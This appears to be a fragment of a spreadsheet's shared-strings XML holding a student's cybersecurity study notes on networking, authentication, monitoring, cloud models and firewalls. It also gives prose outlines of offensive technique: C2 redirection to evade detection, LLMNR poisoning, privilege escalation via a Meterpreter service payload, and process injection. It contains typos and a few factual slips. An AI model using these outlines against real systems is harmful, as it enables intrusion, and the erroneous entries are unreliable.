  </si>
  <si>
    <t>DHCP Offer</t>
  </si>
  <si>
    <t>The server checks available IPs, selects one, and sends it out to the network.</t>
  </si>
  <si>
    <t>DHCP Request</t>
  </si>
  <si>
    <t>The client sends a message back to DHCP server.</t>
  </si>
  <si>
    <t>DHCP ACK</t>
  </si>
  <si>
    <t>The server tells the client the IP is valid for a period of time called the DHCP lease. Once it expires, the DHCP server can give that IP to another device.</t>
  </si>
  <si>
    <t>Create the packet</t>
  </si>
  <si>
    <t>Computer creates a packet with the Destinationn IP and port, Source IP and Port</t>
  </si>
  <si>
    <t>Packet to NAT Table</t>
  </si>
  <si>
    <t>Packet is sent to the internal router, which creates a record in the NAT table</t>
  </si>
  <si>
    <t>Going Punblic</t>
  </si>
  <si>
    <t>Router modifies the packet and replaces the source IP with the network's public IP address.</t>
  </si>
  <si>
    <t>Source Recieves and Responds</t>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
      </rPr>
      <t xml:space="preserve">When </t>
    </r>
    <r>
      <rPr>
        <b/>
        <color rgb="FF1155CC"/>
        <u/>
      </rPr>
      <t>google.com</t>
    </r>
    <r>
      <rPr>
        <b/>
      </rPr>
      <t xml:space="preserve"> recieves the packet, it response packet.</t>
    </r>
  </si>
  <si>
    <t>Back to NAT</t>
  </si>
  <si>
    <t>When the router receives the packet, it checks the NAT table to see exactly which device is expecting the packet. It will update the packet and translate the IP to include the new packet details.</t>
  </si>
  <si>
    <t>Return of the Packet</t>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
      </rPr>
      <t xml:space="preserve">The device recieves the packet, and </t>
    </r>
    <r>
      <rPr>
        <b/>
        <color rgb="FF1155CC"/>
        <u/>
      </rPr>
      <t>google.com</t>
    </r>
    <r>
      <rPr>
        <b/>
      </rPr>
      <t xml:space="preserve"> is now accessible.</t>
    </r>
  </si>
  <si>
    <t>Email Process</t>
  </si>
  <si>
    <t>Email sent</t>
  </si>
  <si>
    <t>Sender composes email for reciever, clicks send, email is forwarded to sender's mail transfer agent (email server).</t>
  </si>
  <si>
    <t>Sender's mail server finds reciever's</t>
  </si>
  <si>
    <t>Sender's mail server does a DNS lookup against reciever's domain. Sender gets this via MX record from reciever's MX record.</t>
  </si>
  <si>
    <t xml:space="preserve">Sender's mail sender forwards email to reciever's </t>
  </si>
  <si>
    <t xml:space="preserve">Using SMTP (simple Mail Transfer Protocol), sender's mail server sends the email to reciever's mail server. SMTP uses port 25 and in Application layer 7. </t>
  </si>
  <si>
    <t>Reciever pulls senders email to read it.</t>
  </si>
  <si>
    <t>Key Creation</t>
  </si>
  <si>
    <t>Creating the Message</t>
  </si>
  <si>
    <t>Signing the message</t>
  </si>
  <si>
    <t>Sending the message</t>
  </si>
  <si>
    <t>Validating the Signature</t>
  </si>
  <si>
    <t>SSL Process</t>
  </si>
  <si>
    <t xml:space="preserve">Browser to Server Certificate Request </t>
  </si>
  <si>
    <t xml:space="preserve">When we access a secure website, the browser asks the web server for certificate details. 
</t>
  </si>
  <si>
    <t>Server response to Request</t>
  </si>
  <si>
    <t xml:space="preserve">The server responds with a copy of the SSL certificate containing the public key. </t>
  </si>
  <si>
    <t>Browser Validation</t>
  </si>
  <si>
    <t>The browser validates the certificate by checking the validity date and root CA.</t>
  </si>
  <si>
    <t>Browser applies Server's public key.</t>
  </si>
  <si>
    <t xml:space="preserve">The browser uses the server’s public key to create, encrypt, and send a session key. 
</t>
  </si>
  <si>
    <t>Server Key  Decryption</t>
  </si>
  <si>
    <t xml:space="preserve">The server decrypts the key, sends an acknowledgement, and starts an encrypted session.   
</t>
  </si>
  <si>
    <t>Secure Web Traffic Begins</t>
  </si>
  <si>
    <t xml:space="preserve">Secure web traffic begins. Server and browser encrypt/decrypt data with the session key. </t>
  </si>
  <si>
    <t>NSM Stages and Processes</t>
  </si>
  <si>
    <t>Detection</t>
  </si>
  <si>
    <t>An alert is generated in the Sguil analyst console.
- Collection
- Analysis</t>
  </si>
  <si>
    <t>Response</t>
  </si>
  <si>
    <t>A security team responds to a security incident.
- Escalation
- Resolution</t>
  </si>
  <si>
    <t>Elastic Stack</t>
  </si>
  <si>
    <t>Generates Alert</t>
  </si>
  <si>
    <t xml:space="preserve">OSSEC generates an alert. 
</t>
  </si>
  <si>
    <t>Sends alert data to Server</t>
  </si>
  <si>
    <t>OSSEC sends alert data gathered from syslog to Security Onion’s OSSEC server.</t>
  </si>
  <si>
    <t>Alert written to Logstash</t>
  </si>
  <si>
    <t xml:space="preserve">The OSSEC-generated syslog alert is written to Logstash for storage.
</t>
  </si>
  <si>
    <t>Log Data Ingested into ElastiSearch and prepares for data presentation.</t>
  </si>
  <si>
    <t xml:space="preserve">Log data is ingested into the Elasticsearch analytics engine, which parses _x000b_hundreds of thousands of data points to prepare for data presentation.
</t>
  </si>
  <si>
    <t>Kibana Interaction</t>
  </si>
  <si>
    <t xml:space="preserve">Users interact with data through the Kibana web interface.
</t>
  </si>
  <si>
    <t>Cookie Creation</t>
  </si>
  <si>
    <t>Before Session</t>
  </si>
  <si>
    <t xml:space="preserve">Bob visits a shopping site and clicks a button to add one loaf of bread to his shopping cart.
</t>
  </si>
  <si>
    <t>POST Request</t>
  </si>
  <si>
    <t xml:space="preserve">The button sends a POST request to the HTTP server with Bob’s one cart item.
</t>
  </si>
  <si>
    <t>HTTP Initiates and Creates Session</t>
  </si>
  <si>
    <t>The site’s database stores the session info with Bob’s shopping list and links it to the cookie.</t>
  </si>
  <si>
    <t>Cookie is Created</t>
  </si>
  <si>
    <t>Cookie is Created for Bob's Session</t>
  </si>
  <si>
    <t>Cookie and Session Response</t>
  </si>
  <si>
    <t>Cookie and session is sent back in HTTP Response</t>
  </si>
  <si>
    <t>Container Becomes a Microservice</t>
  </si>
  <si>
    <t>OS Declaration</t>
  </si>
  <si>
    <t>Declare a base operating system for the microservice to run on.</t>
  </si>
  <si>
    <t>Copy Source Code</t>
  </si>
  <si>
    <t>Copy the microservice’s source code to the container</t>
  </si>
  <si>
    <t>Set a launch command</t>
  </si>
  <si>
    <t xml:space="preserve">Set a command that launches the microservice.
</t>
  </si>
  <si>
    <t>PHP</t>
  </si>
  <si>
    <t>A user visits their favorite boating website: mycoolboat.com.</t>
  </si>
  <si>
    <t>While on mycoolboat.com, the user clicks a Shopping link to redirect to a .php webpage (mycoolboat.com/shopping.php), where boats for sale are displayed.</t>
  </si>
  <si>
    <t>A  HTTP request is made to the web server.</t>
  </si>
  <si>
    <t>The web server for mycoolboat.com pre-processes the PHP scripts to request the list of boats from MyCoolBoat’s database.</t>
  </si>
  <si>
    <t>The database returns the requested data, and the web server sends the processed HTML back to the user with an HTTP response.</t>
  </si>
  <si>
    <t>The user’s browser renders the HTML to display the list of boats to the user.</t>
  </si>
  <si>
    <t>Web Apps Interaction with Back-End Servers</t>
  </si>
  <si>
    <t>Client Request</t>
  </si>
  <si>
    <t>A user’s browser (the client) requests an image of a car to be displayed with an HTTP request.</t>
  </si>
  <si>
    <t>Server Response</t>
  </si>
  <si>
    <t>The web server (the server) responds with that car image by sending an _x000b_HTTP response.</t>
  </si>
  <si>
    <t>Client Output</t>
  </si>
  <si>
    <t>The browser receives the HTTP response and renders the image of the car to the user.</t>
  </si>
  <si>
    <t>Pentest Methodology</t>
  </si>
  <si>
    <t>Planning and reconnaissance</t>
  </si>
  <si>
    <t>Define the purpose and scope of the test, and sign all legal contracts. Obtain publicly available information about your target.</t>
  </si>
  <si>
    <t>Scanning</t>
  </si>
  <si>
    <t>Use tools to run a scan against your target to gather information, such as open ports, and run services to determine potential vulnerabilities.</t>
  </si>
  <si>
    <t>Attack the vulnerabilities discovered in the previous steps in order to gain access to the target.</t>
  </si>
  <si>
    <t>Post exploitation</t>
  </si>
  <si>
    <t>Gather valuable information from the compromised systems.</t>
  </si>
  <si>
    <t>Reporting</t>
  </si>
  <si>
    <t>Redirection Through Proxies</t>
  </si>
  <si>
    <t>Host that directly connects to the C2 server for simplicity. However, in a real penetration test, that would be a poor decision, because a simple packet collection would detect the C2 server IP, which could be blocked. To avoid this detection, a pentester could have the C2 redirected through proxies.</t>
  </si>
  <si>
    <t>Utilizing multiple channels</t>
  </si>
  <si>
    <t>Having the agent use multiple ways, or channels, to communicate back to the server. A compromised host can communicate using either a single channel or several channels over various protocols. eg, DNS, HTTP, HTTPS, TCP, and SMB.
The protocol used is dependent on the target’s network firewall egress rules. Most egress rules allow HTTP/S and DNS outbound, which is why those channels are commonly used for C2 communication.</t>
  </si>
  <si>
    <t>Utilizing multiple C2 frameworks</t>
  </si>
  <si>
    <t>C2 frameworks each have their own “fingerprints” or “indicators of compromise.
Not all C2 frameworks support every OS. Some only support Windows, not Linux, for example.
It’s good to have a secondary C2 framework that supports an OS if the primary C2 framework doesn’t support it.</t>
  </si>
  <si>
    <t>Successful Privilege Escalation</t>
  </si>
  <si>
    <t xml:space="preserve">Utilize information gathered during enumeration.
</t>
  </si>
  <si>
    <t>Gathering information allows us to identify a potential path to privilege escalation.
Common Linux paths of privilege escalation:
- Abusing current access (E.g., sudo group, writable files, read access to sensitive files)
- Exploitation of software (Some services may run as a higher-privileged user.)
- Utilizing weak passwords of privileged users</t>
  </si>
  <si>
    <t>Use the path of least resistance.</t>
  </si>
  <si>
    <t>Search for the easiest possible way to obtain your objective instead of jumping to a difficult task.</t>
  </si>
  <si>
    <t>Exploit vulnerable software.</t>
  </si>
  <si>
    <t>Exploitation of vulnerable software is often suggested as a last step due to the nature of privilege-escalation techniques.
- Often, it involves abusing a service which has the potential to crash and bring down the machine.
- For this reason, finding as much information as possible on the machine during enumeration is key to help find any other possible privilege-escalation paths.</t>
  </si>
  <si>
    <t>New Technology LAN Manager (NTLM) Authentication</t>
  </si>
  <si>
    <t>User shares information to client</t>
  </si>
  <si>
    <t>The user shares their username, password, and domain name with the client.</t>
  </si>
  <si>
    <t>Client encodes password, then deletes</t>
  </si>
  <si>
    <t>The client develops a scrambled version of the password—a hash—and deletes the full password.</t>
  </si>
  <si>
    <t>Client sends plaintext password to server</t>
  </si>
  <si>
    <t>The client passes a plain-text version of the username to the relevant server.</t>
  </si>
  <si>
    <t>Server replies to client with challenge</t>
  </si>
  <si>
    <t>The server replies to the client with a challenge, which is a 16-byte random number.</t>
  </si>
  <si>
    <t>Client responds with encrypted challenge</t>
  </si>
  <si>
    <t>In response, the client sends the challenge encrypted by the hash of the user’s password.</t>
  </si>
  <si>
    <t>Server sends info to DC</t>
  </si>
  <si>
    <t>The server then sends the challenge, response, and username to the domain controller (DC).</t>
  </si>
  <si>
    <t>DC uses encrypted password to encrypt challenge</t>
  </si>
  <si>
    <t>The DC retrieves the user’s password from the database and uses it to encrypt the challenge.</t>
  </si>
  <si>
    <t>DC compares encrypted challend and client response</t>
  </si>
  <si>
    <t>The DC then compares the encrypted challenge and client response. If these two pieces match, then the user is authenticated and access is granted.</t>
  </si>
  <si>
    <t>Authenticate to the Domain in Kerberos</t>
  </si>
  <si>
    <t>AS-REQ</t>
  </si>
  <si>
    <t>The user sends a message to the DC with the ID of the user, the ID of the requested service, and the client net address (IP). This message is encrypted with the password hash of the user and a timestamp. The message is sent in the form of an AS-REQ (authentication service request).</t>
  </si>
  <si>
    <t>KDC Verification</t>
  </si>
  <si>
    <t>The DC, also known as the key distribution center (KDC), receives the user's request and checks the username. It looks up the user’s password hash and attempts to decrypt the message using the password hash. If it successfully decrypts the message, it knows the user supplied the correct password.</t>
  </si>
  <si>
    <t>AS-REP</t>
  </si>
  <si>
    <t xml:space="preserve">The DC then responds to the message with a Ticket Granting Ticket (TGT). This TGT is proof that the user is who they say they are. This response is called the AS-REP (authentication service reply).
</t>
  </si>
  <si>
    <t>Local Link Multicast Name Resolution (LLMNR) Poisoning</t>
  </si>
  <si>
    <t>Attacker Listens on network</t>
  </si>
  <si>
    <t>The attacker listens for LLMNR requests on the network.</t>
  </si>
  <si>
    <t>User visits network share that doesn't exist.</t>
  </si>
  <si>
    <t xml:space="preserve">A Windows machine user tries to visit a network share that doesn't exist or makes a typo trying to visit an existing one. </t>
  </si>
  <si>
    <t>Victim requests network share location to DNS server</t>
  </si>
  <si>
    <t xml:space="preserve">The victim’s computer asks the DNS server if it knows where the network share is.The server responds with a share not found. </t>
  </si>
  <si>
    <t>User PC sends LLMNR broadcast</t>
  </si>
  <si>
    <t>The user’s computer then sends an LLMNR broadcast to the entire network, asking if any machines know where the file share is.</t>
  </si>
  <si>
    <t>Attacker recieves request.</t>
  </si>
  <si>
    <t xml:space="preserve">The attacker receives this request and responds by asking the computer to encode a challenge with the user’s password. </t>
  </si>
  <si>
    <t>Once the attacker receives the challenge encoded with the password, it responds to the computer with an error, which ends the communication. The attacker now has the victim’s password, which they can crack offline.</t>
  </si>
  <si>
    <t>Windows Privilege Escalation Attack Path</t>
  </si>
  <si>
    <t>Create a new service</t>
  </si>
  <si>
    <t>As an administrator, create a new service in Windows.</t>
  </si>
  <si>
    <t>Tell sevice to execute exe payload</t>
  </si>
  <si>
    <t>Tell the service to execute an executable of our choice, such as a Meterpreter payload.</t>
  </si>
  <si>
    <t>start and listen to  payload</t>
  </si>
  <si>
    <t>Start the service and listen for the payload callback_x000b_in Metasploit</t>
  </si>
  <si>
    <t>Process Migration</t>
  </si>
  <si>
    <t>Open a handle to a target process.</t>
  </si>
  <si>
    <t>Allocate memory in the target process.</t>
  </si>
  <si>
    <t>Write the payload contents into the newly allocated section of memory in the target process.</t>
  </si>
  <si>
    <t>Run the new payload contents in the target process.</t>
  </si>
  <si>
    <t>The Digital Forensic Process (accord. NIST - 800-86)</t>
  </si>
  <si>
    <t>Collection:</t>
  </si>
  <si>
    <t>We must first collect the data before we can examine and analyze it. 
The collection phase is the springboard to the digital forensics process. It includes identifying, labeling, recording, and acquiring data from sources while following procedures to preserve the integrity of the data.</t>
  </si>
  <si>
    <t>Examination:</t>
  </si>
  <si>
    <t>The examination phase ensures that all data collected is relevant to the case. 
This includes forensically processing collected data and assessing and extracting data of interest while preserving the integrity of the data. This usually means working from a copy, not the original.</t>
  </si>
  <si>
    <t>Analysis:</t>
  </si>
  <si>
    <t>The analysis phase analyzes the results of the examination.
Analysis uses legally approved methods and techniques to derive information that addresses the questions that inspired the collection and examination of the data.</t>
  </si>
  <si>
    <t>Reporting:</t>
  </si>
  <si>
    <t>Investigators are required to formally report results of the analysis. 
This may include describing the actions used, explaining how tools and procedures were selected, determining what other actions need to be performed, and recommending improvements to the forensic process.</t>
  </si>
  <si>
    <t xml:space="preserve">Terms </t>
  </si>
  <si>
    <t>Categories</t>
  </si>
  <si>
    <t>Local Access Networks (LAN)</t>
  </si>
  <si>
    <t>Advantages</t>
  </si>
  <si>
    <t>Disadvantages</t>
  </si>
  <si>
    <t>Network Speed and Performance</t>
  </si>
  <si>
    <t>Close physical connections are significantly faster and perform better.</t>
  </si>
  <si>
    <t>Network Security</t>
  </si>
  <si>
    <t>Local security devices allow business to control what comes in and out of network and who has access to resources.</t>
  </si>
  <si>
    <t>Versatility</t>
  </si>
  <si>
    <t>New Network devices can be easily installed into a network due to proximity of the devices.</t>
  </si>
  <si>
    <t>Wide Area Networks (WAN)</t>
  </si>
  <si>
    <t>Larger Geographical area</t>
  </si>
  <si>
    <t>Employees and stakeholders are able to share or access resources across a much larger area.</t>
  </si>
  <si>
    <t>Security Issues</t>
  </si>
  <si>
    <t>Traffic from LAN to WAN needs to be encrypted and never captured.</t>
  </si>
  <si>
    <t>Troubleshooting</t>
  </si>
  <si>
    <t>Traffic outside of LAN can be challenging to troubleshoot and resolve</t>
  </si>
  <si>
    <t>Ring Topology</t>
  </si>
  <si>
    <t>Simple to Build</t>
  </si>
  <si>
    <t>Simple to set up.</t>
  </si>
  <si>
    <t>Point of Failures</t>
  </si>
  <si>
    <t>A single device failure can interrupt the entire network</t>
  </si>
  <si>
    <t>Easy Device Deployment</t>
  </si>
  <si>
    <t>network devices are simple to deploy</t>
  </si>
  <si>
    <t>Latency</t>
  </si>
  <si>
    <t>Each device has different latency depending on which node a devices want to communicate with.</t>
  </si>
  <si>
    <t>No Central Node</t>
  </si>
  <si>
    <t>Does not require a</t>
  </si>
  <si>
    <t>Linear Topology</t>
  </si>
  <si>
    <t>Easy Device Installment</t>
  </si>
  <si>
    <t>Adding devices to a network is easy</t>
  </si>
  <si>
    <t>Latency is variable between devices on the network.</t>
  </si>
  <si>
    <t>Consistency</t>
  </si>
  <si>
    <t>Communication delay is consistent between devices since every node is connected through a centralised Node</t>
  </si>
  <si>
    <t>Constraint</t>
  </si>
  <si>
    <t>Limited devices available for connections available on a sigle central node</t>
  </si>
  <si>
    <t>Low  Impacting Point of Failure</t>
  </si>
  <si>
    <t>Failure on any device does not impact the network, only central node failure will impact network.</t>
  </si>
  <si>
    <t>Proximity Setting Up</t>
  </si>
  <si>
    <t>It is difficult to set up if the central node is physically far away from endpoints.</t>
  </si>
  <si>
    <t>Easy Extention</t>
  </si>
  <si>
    <t>Extending the network is easy.</t>
  </si>
  <si>
    <t>Bus Topology</t>
  </si>
  <si>
    <t>Fast Data Transmission</t>
  </si>
  <si>
    <t>Data transmission between all nodes is fast.</t>
  </si>
  <si>
    <t>Wastes Bandwidth</t>
  </si>
  <si>
    <t>Sending data to every node wastes network bandwidth</t>
  </si>
  <si>
    <t>Simultaneous Data Transmitting</t>
  </si>
  <si>
    <t>Two devices cannot transmit data simultaneously</t>
  </si>
  <si>
    <t>Tree Topology</t>
  </si>
  <si>
    <t>Hierachal Impact</t>
  </si>
  <si>
    <t>Higher POF affect all below devices</t>
  </si>
  <si>
    <t>Fully Connected Topology</t>
  </si>
  <si>
    <t>Highly Redundant</t>
  </si>
  <si>
    <t>If a Single device fails, all devices can still communicate with each other.</t>
  </si>
  <si>
    <t>Difficult to set up and manage</t>
  </si>
  <si>
    <t>Topology is very difficult to set up and manage</t>
  </si>
  <si>
    <t>Point-to-Point Transmission</t>
  </si>
  <si>
    <t>Data transmission is point-to-point between directly connected devices. Sinc all devices are connected, transmission is fast.</t>
  </si>
  <si>
    <t>Very Expensive</t>
  </si>
  <si>
    <t>The number of links in the network scales exponentially with each single device added to the network, making it very expensive to set up and manage</t>
  </si>
  <si>
    <t>All-in-One Device</t>
  </si>
  <si>
    <t>Easy to use</t>
  </si>
  <si>
    <t>Less equipment requires setup and maintenance</t>
  </si>
  <si>
    <t>Point of Failure</t>
  </si>
  <si>
    <t>Single point of failure is difficult to identify</t>
  </si>
  <si>
    <t>Public IPs</t>
  </si>
  <si>
    <t>Accessible over internet</t>
  </si>
  <si>
    <t>Public IPs resources are accessible over the internet</t>
  </si>
  <si>
    <t>Not all resources should be accessible over the internet. Potentially exposes devices to malicous actors.</t>
  </si>
  <si>
    <t>Not Publicly accessible</t>
  </si>
  <si>
    <t>Private IPs cannot be exposed on the internet and  therefore are more secure.</t>
  </si>
  <si>
    <t>Private IPs cannot be accessible over the public internet.</t>
  </si>
  <si>
    <t>Can be reused</t>
  </si>
  <si>
    <t>Private IPs can be reused but within different LANs</t>
  </si>
  <si>
    <t>Assigned by Admin</t>
  </si>
  <si>
    <t>Only assigned by network administrator of LAN.</t>
  </si>
  <si>
    <t>Cannot Conflict</t>
  </si>
  <si>
    <t>Private Ips can't conflict with other differnt networks.</t>
  </si>
  <si>
    <t xml:space="preserve">Routing: Unicast </t>
  </si>
  <si>
    <t>Many unicast messages sent</t>
  </si>
  <si>
    <t>If a message has multipl destinations, many unicast messages must be sent</t>
  </si>
  <si>
    <t xml:space="preserve">Routing: Broadcast </t>
  </si>
  <si>
    <t>Unecessary Traffic</t>
  </si>
  <si>
    <t>Broadcast is sent to everyone on network, causing flooding of unecessary traffic.</t>
  </si>
  <si>
    <t xml:space="preserve">Routing: Multicast </t>
  </si>
  <si>
    <t>Maintenance Accuracy</t>
  </si>
  <si>
    <t>Intended recipients will need to be updated and maintained to make sure they're accurate.</t>
  </si>
  <si>
    <t xml:space="preserve">Static Routing: </t>
  </si>
  <si>
    <t>Lower CPU usage on Router</t>
  </si>
  <si>
    <t>Network admin has full control over network's routing behaviour.</t>
  </si>
  <si>
    <t>Fault Tolerance</t>
  </si>
  <si>
    <t>If a device on a manually created path fails, the route can't be adjusted.</t>
  </si>
  <si>
    <t>Adaptive Network</t>
  </si>
  <si>
    <t>Network is adaptive and data gets forwarded on a different route depending on the network conditions.</t>
  </si>
  <si>
    <t>Primary Routing Technique</t>
  </si>
  <si>
    <t>Primary Routing technique used over the internet.</t>
  </si>
  <si>
    <t xml:space="preserve">Routing Protocols </t>
  </si>
  <si>
    <t>Uses Routing protocols to determine best route for routing traffic</t>
  </si>
  <si>
    <t>Symmetric Key Encryption:</t>
  </si>
  <si>
    <t>Secure Key Exchange</t>
  </si>
  <si>
    <t>Offline Exchange and Diffie-Hellman Exchange</t>
  </si>
  <si>
    <t>Key Management</t>
  </si>
  <si>
    <t>Amount of symmetric keys can become overwhelming and less secure in a large network.</t>
  </si>
  <si>
    <t>MAC Layer Firewall</t>
  </si>
  <si>
    <t>Protecting</t>
  </si>
  <si>
    <t>Can secure the network from novice attackers</t>
  </si>
  <si>
    <t>Easily Bypassed</t>
  </si>
  <si>
    <t>Can be easily bypassed by _x000b_MAC spoofing.</t>
  </si>
  <si>
    <t>Packet-Filtering Firewalls (Stateless)</t>
  </si>
  <si>
    <t>Not resource intensive</t>
  </si>
  <si>
    <t>They are low-cost and do not have a significant impact on system performance.</t>
  </si>
  <si>
    <t>Easy to subvert compared to more robust firewalls.</t>
  </si>
  <si>
    <t>Small Network Optimized</t>
  </si>
  <si>
    <t xml:space="preserve">Work best with small networks. 
</t>
  </si>
  <si>
    <t>Operates on 1 layer</t>
  </si>
  <si>
    <t>Only operate at the _x000b_network layer.</t>
  </si>
  <si>
    <t>They are vulnerable to spoofing and do not support custom based rule sets.</t>
  </si>
  <si>
    <t>Packet-Filtering Firewalls (Stateful)</t>
  </si>
  <si>
    <t>Transparent Mode</t>
  </si>
  <si>
    <t>Offer transparent mode, which allows direct connections between clients and servers.</t>
  </si>
  <si>
    <t>Resource Intensive</t>
  </si>
  <si>
    <t>Are resource-intensive systems.</t>
  </si>
  <si>
    <t>Circuit-Level Firewalls</t>
  </si>
  <si>
    <t>Efficient and easy to implement</t>
  </si>
  <si>
    <t>Quickly and easily approve and deny _x000b_traffic without consuming significant computing resources.</t>
  </si>
  <si>
    <t>Does not check packet contents.</t>
  </si>
  <si>
    <t>Do not check the contents of the packet.</t>
  </si>
  <si>
    <t>Cheap</t>
  </si>
  <si>
    <t>Relatively inexpensive and provide anonymity to the private network.</t>
  </si>
  <si>
    <t>Limited filtering</t>
  </si>
  <si>
    <t>If a packet contains malware but has the correct TCP information, the data is allowed to _x000b_pass through.</t>
  </si>
  <si>
    <t>Application / Proxy Firewalls</t>
  </si>
  <si>
    <t>Security</t>
  </si>
  <si>
    <t>More secure than other implementations and provide simple log and file audit management for incoming traffic.</t>
  </si>
  <si>
    <t>Resource intensive. Requires robust modern hardware and high costs. Bypassed with encryption</t>
  </si>
  <si>
    <t>Signature-based IDS</t>
  </si>
  <si>
    <t>Identifiable</t>
  </si>
  <si>
    <t xml:space="preserve">Good for identifying well-known attacks. </t>
  </si>
  <si>
    <t>Vulnerable</t>
  </si>
  <si>
    <t>Vulnerable to attacks through packet manipulation.</t>
  </si>
  <si>
    <t>Adaptable</t>
  </si>
  <si>
    <t xml:space="preserve">Can be updated as new attack signatures _x000b_are released. </t>
  </si>
  <si>
    <t>Zero-Day Limitation</t>
  </si>
  <si>
    <t>Unable to detect zero-day attacks.</t>
  </si>
  <si>
    <t>Anomaly-based IDS</t>
  </si>
  <si>
    <t>Effective</t>
  </si>
  <si>
    <t xml:space="preserve">Good for detecting suspicious traffic that deviates from well-known baselines. </t>
  </si>
  <si>
    <t>Inacurracy</t>
  </si>
  <si>
    <t>Prone to false alerts.</t>
  </si>
  <si>
    <t>Excellent at detecting when attackers probe and sweep a network.</t>
  </si>
  <si>
    <t>Assumption</t>
  </si>
  <si>
    <t xml:space="preserve">Assumes network behavior does not _x000b_deviate from well-known baselines. </t>
  </si>
  <si>
    <t>Network Security Monitoring</t>
  </si>
  <si>
    <t xml:space="preserve">Track adversaries </t>
  </si>
  <si>
    <t>Track adversaries through a network and determine intent.</t>
  </si>
  <si>
    <t xml:space="preserve">Cannot read </t>
  </si>
  <si>
    <t>Cannot read encrypted traffic.</t>
  </si>
  <si>
    <t xml:space="preserve">Acquire intelligence </t>
  </si>
  <si>
    <t>Acquire intelligence and situational awareness.</t>
  </si>
  <si>
    <t>Higher Costs</t>
  </si>
  <si>
    <t>Powerful hardware and CPU requirements mean higher costs.</t>
  </si>
  <si>
    <t xml:space="preserve">Proactive </t>
  </si>
  <si>
    <t>Be proactive by identifying vulnerabilities.</t>
  </si>
  <si>
    <t xml:space="preserve">Difficulty Reading </t>
  </si>
  <si>
    <t>Difficulty reading radio transmissions, meaning attackers can use mobile radio communications to obfuscate attacks.</t>
  </si>
  <si>
    <t xml:space="preserve">Reactive </t>
  </si>
  <si>
    <t xml:space="preserve">Be reactive through incident response and network forensics.
</t>
  </si>
  <si>
    <t xml:space="preserve">Invasive Process </t>
  </si>
  <si>
    <t>NSM is an invasive process that monitors and records all network data.</t>
  </si>
  <si>
    <t xml:space="preserve">Provides insights </t>
  </si>
  <si>
    <t xml:space="preserve">Provide insights about advanced persistent threats. </t>
  </si>
  <si>
    <t>Limiting</t>
  </si>
  <si>
    <t xml:space="preserve">Placement of an NSM can be limited at certain areas of the network. 
</t>
  </si>
  <si>
    <t>Uncovers Malware</t>
  </si>
  <si>
    <t>Microservices</t>
  </si>
  <si>
    <t>Flexibility</t>
  </si>
  <si>
    <t>System administrators and developers can deploy changes without taking entire applications down for extended periods of time.</t>
  </si>
  <si>
    <t>Increased Complexity</t>
  </si>
  <si>
    <t xml:space="preserve">Microservices have increased complexity and require more maintenance as the application and number of components grows.
</t>
  </si>
  <si>
    <t>Seperation</t>
  </si>
  <si>
    <t>Separating an application’s components into their own machines allows the sysadmin to update the front end, reboot it, and only have to verify that the front end components are working.</t>
  </si>
  <si>
    <t xml:space="preserve">Each service comes with come with unique security issues. 
</t>
  </si>
  <si>
    <t>Ease of Mind</t>
  </si>
  <si>
    <t>They don't have to worry about the back end components and database.</t>
  </si>
  <si>
    <t>Compromise</t>
  </si>
  <si>
    <t>If a component is compromised by a hacker, the potential damage is restricted to only that one component.</t>
  </si>
  <si>
    <t>Scalability and resilience:</t>
  </si>
  <si>
    <t xml:space="preserve">Replication of identical components allows you to serve more clients and provides identical backup components if one fails.
</t>
  </si>
  <si>
    <t>Isolated improvement:</t>
  </si>
  <si>
    <t xml:space="preserve">Since microservices should be reduced to serving one primary function, they can be developed to optimize their functionality.
</t>
  </si>
  <si>
    <t>Rapid response:</t>
  </si>
  <si>
    <t>Since microservice components are inherently smaller than monoliths, they can be replaced and updated quickly.</t>
  </si>
  <si>
    <t>Isolated security:</t>
  </si>
  <si>
    <t>One compromised component does not equal a compromised application</t>
  </si>
  <si>
    <t>IaaS (Infrastructure as a Service)</t>
  </si>
  <si>
    <t>High availability</t>
  </si>
  <si>
    <t>Is highly avaliablke for use.</t>
  </si>
  <si>
    <t>Assurance</t>
  </si>
  <si>
    <t>Assurance that base machines are up-to-date at the time of deployment.</t>
  </si>
  <si>
    <t>Provider-enforced security controls, such as basic access management.</t>
  </si>
  <si>
    <t>PaaS (Platform as a Service)</t>
  </si>
  <si>
    <t>Provider Infrastructure Provided</t>
  </si>
  <si>
    <t>The provider supplies the underlying infrastructure.</t>
  </si>
  <si>
    <t>Powerful Security</t>
  </si>
  <si>
    <t>Organizations can leverage powerful applications that are guaranteed to be secure and available, without having to implement security themselves.</t>
  </si>
  <si>
    <t>Guarentees Availability</t>
  </si>
  <si>
    <t>It guarantees availability and provides access only to the ports necessary to connect to the labs.</t>
  </si>
  <si>
    <t>SaaS (Software as a Service)</t>
  </si>
  <si>
    <t>Web Accessible</t>
  </si>
  <si>
    <t>Users subscribe to the software and access it through the web or vendor APIs.</t>
  </si>
  <si>
    <t>Guarenteed Security</t>
  </si>
  <si>
    <t>The software runs in environments that are guaranteed by the provider to be secure.</t>
  </si>
  <si>
    <t>Worry-free</t>
  </si>
  <si>
    <t>Engineers do not need to worry about secure deployment.</t>
  </si>
  <si>
    <t xml:space="preserve">DaaS/DBaaS (Data as a Service/ Database as a Service)  </t>
  </si>
  <si>
    <t>The main security advantages of DaaS are high  fault tolerance.</t>
  </si>
  <si>
    <t>Availability</t>
  </si>
  <si>
    <t>DaaS ensures data is always available, even if there is a power outage at a single data center, and ensures that data is deployed as close as possible to those consuming it, reducing latency.</t>
  </si>
  <si>
    <t>Categorization</t>
  </si>
  <si>
    <t>Keep databases of consumers categorized for many different industries.</t>
  </si>
  <si>
    <t>CaaS (Communications as a Service)</t>
  </si>
  <si>
    <t>Vulnerability Focussed</t>
  </si>
  <si>
    <t>Guarantees security by ensuring that communications are not vulnerable to eavesdropping</t>
  </si>
  <si>
    <t>Monitored &amp; Recorded</t>
  </si>
  <si>
    <t>Provides comprehensive monitoring/record-keeping for auditing purposes.</t>
  </si>
  <si>
    <t>Virtual Networks</t>
  </si>
  <si>
    <t>VMs on a virtual network can live _x000b_in different data centers but perform as if they are wired, and provide improved availability.</t>
  </si>
  <si>
    <t>Virtual networks can be quickly and easily reconfigured by clicking a few buttons in the portal.</t>
  </si>
  <si>
    <t>Efficient and Secure</t>
  </si>
  <si>
    <t>Dramatically faster and safer than rewiring a physical network to implement improved segmentation. It also results in less human error.</t>
  </si>
  <si>
    <t>Cloud Storage</t>
  </si>
  <si>
    <t>Disaster Recovery (DR)</t>
  </si>
  <si>
    <t>Data is at a reduced risk of system failure since all data is stored and backed-up on an external devise often thousands of miles away from your own location.</t>
  </si>
